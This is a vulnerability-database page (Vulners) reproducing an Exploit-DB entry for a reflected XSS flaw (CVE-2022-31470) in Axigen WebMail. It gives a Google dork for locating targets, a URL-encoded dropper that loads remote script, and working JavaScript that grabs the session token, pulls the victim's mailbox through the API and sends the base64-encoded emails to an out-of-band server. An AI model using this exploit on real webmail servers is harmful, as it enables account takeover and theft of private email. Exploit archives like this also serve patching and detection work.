Vulners
Lucene search
Axigen < 10.3.3.47, 10.2.3.12 - Reflected XSS Vulnerability
| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
 | Exploit for Cross-site Scripting in Axigen Axigen_Mobile_Webmail | 13 Sep 202305:59 | ā | githubexploit |
 | CVE-2022-31470 | 7 Jun 202221:15 | ā | attackerkb |
 | CVE-2022-31470 | 8 Jun 202200:31 | ā | circl |
 | Axigen Mobile WebMail č·Øē«čę¬ę¼ę“ | 7 Jun 202200:00 | ā | cnnvd |
 | CVE-2022-31470 | 7 Jun 202200:00 | ā | cve |
 | CVE-2022-31470 | 7 Jun 202200:00 | ā | cvelist |
 | Axigen < 10.3.3.47, 10.2.3.12 - Reflected XSS | 8 Sep 202300:00 | ā | exploitdb |
 | Axigen WebMail - Cross-Site Scripting | 12 Jun 202603:02 | ā | nuclei |
 | CVE-2022-31470 | 7 Jun 202221:15 | ā | nvd |
 | CVE-2022-31470 | 7 Jun 202221:15 | ā | osv |
10
# Exploit Title: Axigen < 10.3.3.47, 10.2.3.12 - Reflected XSS
# Google Dork: inurl:passwordexpired=yes
# Exploit Author: AmirZargham
# Vendor Homepage: https://www.axigen.com/
# Software Link: https://www.axigen.com/mail-server/download/
# Version: (10.5.0ā4370c946) and older version of Axigen WebMail
# Tested on: firefox,chrome
# CVE: CVE-2022-31470
Exploit
We use the second Reflected XSS to exploit this vulnerability, create a
malicious link, and steal user emails.
Dropper code
This dropper code, loads and executes JavaScript exploit code from a remote
server.
');
x = document.createElement('script');
x.src = 'https://example.com/exploit.js';
window.addEventListener('DOMContentLoaded',function y(){
document.body.appendChild(x)
})//
Encoded form
/index.hsp?m=%27)%3Bx%3Ddocument.createElement(%27script%27)%3Bx.src%3D%27
https://example.com/exploit.js%27%3Bwindow.addEventListener(%27DOMContentLoaded%27,function+y(){document.body.appendChild(x)})//
Exploit code
xhr1 = new XMLHttpRequest(), xhr2 = new XMLHttpRequest(), xhr3 = new
XMLHttpRequest();
oob_server = 'https://example.com/';
var script_tag = document.createElement('script');
xhr1.open('GET', '/', true);
xhr1.onreadystatechange = () => {
if (xhr1.readyState === XMLHttpRequest.DONE) {
_h_cookie = new URL(xhr1.responseURL).search.split("=")[1];
xhr2.open('PATCH', `/api/v1/conversations/MQ/?_h=${_h_cookie}`,
true);
xhr2.setRequestHeader('Content-Type', 'application/json');
xhr2.onreadystatechange = () => {
if (xhr2.readyState === XMLHttpRequest.DONE) {
if (xhr2.status === 401){
script_tag.src =
`${oob_server}?status=session_expired&domain=${document.domain}`;
document.body.appendChild(script_tag);
} else {
resp = xhr2.responseText;
folderId = JSON.parse(resp)["mails"][0]["folderId"];
xhr3.open('GET',
`/api/v1/conversations?folderId=${folderId}&_h=${_h_cookie}`, true);
xhr3.onreadystatechange = () => {
if (xhr3.readyState === XMLHttpRequest.DONE) {
emails = xhr3.responseText;
script_tag.src =
`${oob_server}?status=ok&domain=${document.domain}&emails=${btoa(emails)}`;
document.body.appendChild(script_tag);
}
};
xhr3.send();
}
}
};
var body = JSON.stringify({isUnread: false});
xhr2.send(body);
}
};
xhr1.send();
Combining dropper and exploit
You can host the exploit code somewhere and then address it in the dropper
code.
Data
Build on a solid foundation withĀ Vulners data
WeĀ provide theĀ essential building blocks forĀ cybersecurity solutions withĀ comprehensive, structured, andĀ constantly updated vulnerability andĀ exploits data
Api
Power your application withĀ Vulners API
The Vulners REST API offers reliable, high-performance access toĀ vulnerabilityĀ intelligence, withĀ 99.9%Ā SLAĀ uptime andĀ CDN-backed data delivery forĀ seamlessĀ global access
App
Assess and manage vulnerabilities withĀ VulnersĀ tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
11 Sep 2023 00:00Current
6.3Medium risk
Vulners AI Score6.3
CVSS 24.3
CVSS 3.16.1
EPSS0.26012